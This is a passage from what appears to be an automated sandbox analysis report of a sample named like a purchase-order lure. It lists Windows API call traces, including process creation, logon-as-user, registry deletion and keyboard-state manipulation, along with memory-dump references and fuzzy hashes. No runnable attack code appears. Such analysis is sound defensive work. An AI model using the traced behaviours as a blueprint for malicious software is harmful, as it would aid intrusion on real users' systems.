                        • ShellExecuteExW.SHELL32(?), ref: 00312259
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                          • Part of subcall function 002B3BCF: _wcscpy.LIBCMT ref: 002B3BF2
                        • CloseHandle.KERNEL32(00000000), ref: 00312320
                        • FreeLibrary.KERNEL32(00000000), ref: 0031232F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                        • String ID: @
                        • API String ID: 4082843840-2766056989
                        • Opcode ID: ab56266844e8a1f544da47231b5440c812f5aaa99f8dc66b69e4a1cf750e321a
                        • Instruction ID: 72dc4585c08ffea3ece1098d43c5b57835c851447561fc00d815b80988ddea1e
                        • Opcode Fuzzy Hash: ab56266844e8a1f544da47231b5440c812f5aaa99f8dc66b69e4a1cf750e321a
                        • Instruction Fuzzy Hash: 17716A74A106199FCB09EFA4C8819DEB7F5FF48310F108459E856AB351DB30AD61CF90
                        APIs
                        • GetParent.USER32(?), ref: 002F481D
                        • GetKeyboardState.USER32(?), ref: 002F4832
                        • SetKeyboardState.USER32(?), ref: 002F4893
                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 002F48C1
                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 002F48E0
                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 002F4926
                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002F4949
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: f7fe33793a7abba270bb82a2300048c1dc6bcb7f334a7b01e63b8f69f72ff021
                        • Instruction ID: 5f87390cab78fbb191f34777af6c25c7a7e51b848e7af1e67effd3d202621889
                        • Opcode Fuzzy Hash: f7fe33793a7abba270bb82a2300048c1dc6bcb7f334a7b01e63b8f69f72ff021
                        • Instruction Fuzzy Hash: F45129606287CA3DFB366A34CC45BBBFE995B06384F0885A9E3D5464C3C2D8EDA4D750
                        APIs
                        • GetParent.USER32(00000000), ref: 002F4638
                        • GetKeyboardState.USER32(?), ref: 002F464D
                        • SetKeyboardState.USER32(?), ref: 002F46AE
                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002F46DA
                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002F46F7
                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002F473B
                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002F475C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: dc604ccd99a21c5d7d36ebf0ed138b94bf153d5330dc67df27c69177676d156c
                        • Instruction ID: 1ade354c8b68cc3d8b0163716633b3bfeaab436a0203c647341d7e0a74a93864
                        • Opcode Fuzzy Hash: dc604ccd99a21c5d7d36ebf0ed138b94bf153d5330dc67df27c69177676d156c
                        • Instruction Fuzzy Hash: 435105A05247DB3DFB36AB248C41B77FEA95B06384F0844A8E2D5868C2D3D4ECA4DB50
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcsncpy$LocalTime
                        • String ID:
                        • API String ID: 2945705084-0
                        APIs
                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0034DBF0), ref: 00309409
                        • WSAGetLastError.WSOCK32(00000000), ref: 00309416
                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 0030943A
                        • #16.WSOCK32(?,?,00000000,00000000), ref: 00309452
                        • _strlen.LIBCMT ref: 00309484
                        • _memmove.LIBCMT ref: 003094CA
                        • WSAGetLastError.WSOCK32(00000000), ref: 003094F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorLast$_memmove_strlenselect
                        • String ID:
                        • API String ID: 2795762555-0
                        APIs
                        • _memset.LIBCMT ref: 00319DB0
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00319E57
                        • IsMenu.USER32(?), ref: 00319E6F
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00319EB7
                        • DrawMenuBar.USER32 ref: 00319ED0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Menu$Item$DrawInfoInsert_memset
                        • String ID: 0
                        • API String ID: 3866635326-4108050209
                        APIs
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00313C92
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00313CBC
                        • FreeLibrary.KERNEL32(00000000), ref: 00313D71
                          • Part of subcall function 00313C63: RegCloseKey.ADVAPI32(?), ref: 00313CD9
                          • Part of subcall function 00313C63: FreeLibrary.KERNEL32(?), ref: 00313D2B
                          • Part of subcall function 00313C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00313D4E
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00313D16
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                        • String ID:
                        • API String ID: 395352322-0
                        APIs
                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00318DF4
                        • GetWindowLongW.USER32(0168ECB8,000000F0), ref: 00318E27
                        • GetWindowLongW.USER32(0168ECB8,000000F0), ref: 00318E5C
                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00318E8E
                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00318EB8
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00318EC9
                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00318EE3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LongWindow$MessageSend
                        • String ID:
                        • API String ID: 2178440468-0
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002F1734
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002F175A
                        • SysAllocString.OLEAUT32(00000000), ref: 002F175D
                        • SysAllocString.OLEAUT32(?), ref: 002F177B
                        • SysFreeString.OLEAUT32(?), ref: 002F1784
                        • StringFromGUID2.OLE32(?,?,00000028), ref: 002F17A9
                        • SysAllocString.OLEAUT32(?), ref: 002F17B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                        • String ID:
                        • API String ID: 3761583154-0
                        APIs
                          • Part of subcall function 002B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002B31DA
                        • lstrcmpiW.KERNEL32(?,?), ref: 002F6A2B
                        • _wcscmp.LIBCMT ref: 002F6A49
                        • MoveFileW.KERNEL32(?,?), ref: 002F6A62
                          • Part of subcall function 002F6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 002F6DBA
                          • Part of subcall function 002F6D6D: GetLastError.KERNEL32 ref: 002F6DC5
                          • Part of subcall function 002F6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 002F6DD9
                        • _wcscat.LIBCMT ref: 002F6AA4
                        • SHFileOperationW.SHELL32(?), ref: 002F6B0C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                        • String ID: \*.*
                        • API String ID: 2323102230-1173974218
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                        • API String ID: 1038674560-2734436370
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002F180D
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002F1833
                        • SysAllocString.OLEAUT32(00000000), ref: 002F1836
                        • SysAllocString.OLEAUT32 ref: 002F1857
                        • SysFreeString.OLEAUT32 ref: 002F1860
                        • StringFromGUID2.OLE32(?,?,00000028), ref: 002F187A
                        • SysAllocString.OLEAUT32(?), ref: 002F1888
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                        • String ID:
                        • API String ID: 3761583154-0
                        APIs
                          • Part of subcall function 002CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002CC657
                          • Part of subcall function 002CC619: GetStockObject.GDI32(00000011), ref: 002CC66B
                          • Part of subcall function 002CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 002CC675
                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0031A13B
                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0031A148
                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0031A153
                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0031A162
                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0031A16E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$CreateObjectStockWindow
                        • String ID: Msctls_Progress32
                        • API String ID: 1025951953-3636473452
                        APIs
                        • _memset.LIBCMT ref: 0031E14D
                        • _memset.LIBCMT ref: 0031E15C
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00373EE0,00373F24), ref: 0031E18B
                        • CloseHandle.KERNEL32 ref: 0031E19D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memset$CloseCreateHandleProcess
                        • String ID: $?7$>7
                        • API String ID: 3277943733-1332447199
                        APIs
                        • GetClientRect.USER32(?,?), ref: 002CC6C0
                        • GetWindowRect.USER32(?,?), ref: 002CC701
                        • ScreenToClient.USER32(?,?), ref: 002CC729
                        • GetClientRect.USER32(?,?), ref: 002CC856
                        • GetWindowRect.USER32(?,?), ref: 002CC86F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Rect$Client$Window$Screen
                        • String ID:
                        • API String ID: 1296646539-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove$__itow__swprintf
                        • String ID:
                        • API String ID: 3253778849-0
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                          • Part of subcall function 00313AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00312AA6,?,?), ref: 00313B0E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00312FA0
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00312FE0
                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00313003
                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0031302C
                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0031306F
                        • RegCloseKey.ADVAPI32(00000000), ref: 0031307C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                        • String ID:
                        • API String ID: 4046560759-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscpy$_wcscat
                        • String ID:
                        • API String ID: 2037614760-0
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 002F2AF6
                        • VariantClear.OLEAUT32(00000013), ref: 002F2B68
                        • VariantClear.OLEAUT32(00000000), ref: 002F2BC3
                        • _memmove.LIBCMT ref: 002F2BED
                        • VariantClear.OLEAUT32(?), ref: 002F2C3A
                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002F2C68
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Variant$Clear$ChangeInitType_memmove
                        • String ID:
                        • API String ID: 1101466143-0
                        • Opcode ID: d4af208431741d00dc111a8dd924133a55b57e583255a735f076b6829c24859e
                        • Instruction ID: 65a7b74bc7deac0bfdbd9c7d00980c94f2ba4dc62a8181f745967c280ea5b25c
                        • Opcode Fuzzy Hash: d4af208431741d00dc111a8dd924133a55b57e583255a735f076b6829c24859e
                        • Instruction Fuzzy Hash: D4517CB5A10209EFDB14CF58C880AAAB7B8FF4D354F15856AEA49DB310D730E951CFA0
                        APIs
                        • GetMenu.USER32(?), ref: 0031833D
                        • GetMenuItemCount.USER32(00000000), ref: 00318374
                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0031839C
                        • GetMenuItemID.USER32(?,?), ref: 0031840B
                        • GetSubMenu.USER32(?,?), ref: 00318419
                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0031846A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Menu$Item$CountMessagePostString
                        • String ID:
                        • API String ID: 650687236-0
                        • Opcode ID: c7cbe74aef710f7a4062306714268bc50041113814aa398e141de4219388fbce
                        • Instruction ID: b1d7825f842e616cc0673b707bbbc560d25794c3546d1d9e377abf9d5a3e874d
                        • Opcode Fuzzy Hash: c7cbe74aef710f7a4062306714268bc50041113814aa398e141de4219388fbce
                        • Instruction Fuzzy Hash: 9E519E35A00215EFCB06EF65C881AEEB7B8EF48750F154469E915BB351CF30AE418F94
                        APIs
                        • _memset.LIBCMT ref: 002F552E
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002F5579
                        • IsMenu.USER32(00000000), ref: 002F5599
                        • CreatePopupMenu.USER32 ref: 002F55CD
                        • GetMenuItemCount.USER32(000000FF), ref: 002F562B
                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 002F565C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                        • String ID:
                        • API String ID: 3311875123-0
                        • Opcode ID: 7018c37008a5b8b105724827f5c828fdd4b25366460d9dacd7c34ba22749b7e3
                        • Instruction ID: 714da67d2be5a8e200c33e814b4e4147269888ad39912a64cdb96a46d1987cb9
                        • Opcode Fuzzy Hash: 7018c37008a5b8b105724827f5c828fdd4b25366460d9dacd7c34ba22749b7e3
                        • Instruction Fuzzy Hash: 0E51B070620A2E9BDF10CF68D888BBDFBF9AF05394F504129E725DA290D7B09964CB51
                        APIs
                          • Part of subcall function 002CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 002CAF8E
                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 002CB1C1
                        • GetWindowRect.USER32(?,?), ref: 002CB225
                        • ScreenToClient.USER32(?,?), ref: 002CB242
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002CB253
                        • EndPaint.USER32(?,?), ref: 002CB29D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                        • String ID:
                        • API String ID: 1827037458-0
                        • Opcode ID: 35e92a411888d76143768d02870cd5f623636392f4e71b38e50df8bfd1d60be3
                        • Instruction ID: e10823d38e8750b258a8c8393d33b47cc891cf72b5484307d94eb7931f8edaab
                        • Opcode Fuzzy Hash: 35e92a411888d76143768d02870cd5f623636392f4e71b38e50df8bfd1d60be3
                        • Instruction Fuzzy Hash: 3E41C171110200AFD722DF28DC85FBA7BF8EB4A320F14066CF9A9872A1C7719855DB62
                        APIs
                        • ShowWindow.USER32(00371810,00000000,?,?,00371810,00371810,?,0032E2D6), ref: 0031E21B
                        • EnableWindow.USER32(00000000,00000000), ref: 0031E23F
                        • ShowWindow.USER32(00371810,00000000,?,?,00371810,00371810,?,0032E2D6), ref: 0031E29F
                        • ShowWindow.USER32(00000000,00000004,?,?,00371810,00371810,?,0032E2D6), ref: 0031E2B1
                        • EnableWindow.USER32(00000000,00000001), ref: 0031E2D5
                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0031E2F8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$Show$Enable$MessageSend
                        • String ID:
                        • API String ID: 642888154-0
                        • Opcode ID: 83c3beb63e5416716779f59d78acc9535c2c6103bcfa09f0f6711021487eb4be
                        • Instruction ID: 591040abdb382afc01c4611fc81ee24e781a258b74fc9fd95ffba89e9db17134
                        • Opcode Fuzzy Hash: 83c3beb63e5416716779f59d78acc9535c2c6103bcfa09f0f6711021487eb4be
                        • Instruction Fuzzy Hash: 02416235600140EFDB1BDF54C8A9BD47BE9BB0A304F1945B5FE598F5A2C732A882CB51
                        APIs
                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002EBCD9
                        • OpenProcessToken.ADVAPI32(00000000), ref: 002EBCE0
                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002EBCEF
                        • CloseHandle.KERNEL32(00000004), ref: 002EBCFA
                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002EBD29
                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 002EBD3D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                        • String ID:
                        • API String ID: 1413079979-0
                        • Opcode ID: b6cf2544e68e133507965ab33fdde6d21412e6c3e2b459d8afbac28cf95fb1a8
                        • Instruction ID: 9774d8bc81147b698b095e34bcb4160b7d3d594d91c9f0e0b18136ea81ec4473
                        • Opcode Fuzzy Hash: b6cf2544e68e133507965ab33fdde6d21412e6c3e2b459d8afbac28cf95fb1a8
                        • Instruction Fuzzy Hash: 57217C7215424AAFCF039FA9ED49BEE3BADEF04304F144015FA01A6160C7768D61DB60
                        APIs
                          • Part of subcall function 002CB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 002CB5EB
                          • Part of subcall function 002CB58B: SelectObject.GDI32(?,00000000), ref: 002CB5FA
                          • Part of subcall function 002CB58B: BeginPath.GDI32(?), ref: 002CB611
                          • Part of subcall function 002CB58B: SelectObject.GDI32(?,00000000), ref: 002CB63B
                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0031E9F2
                        • LineTo.GDI32(00000000,00000003,?), ref: 0031EA06
                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0031EA14
                        • LineTo.GDI32(00000000,00000000,?), ref: 0031EA24
                        • EndPath.GDI32(00000000), ref: 0031EA34
                        • StrokePath.GDI32(00000000), ref: 0031EA44
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
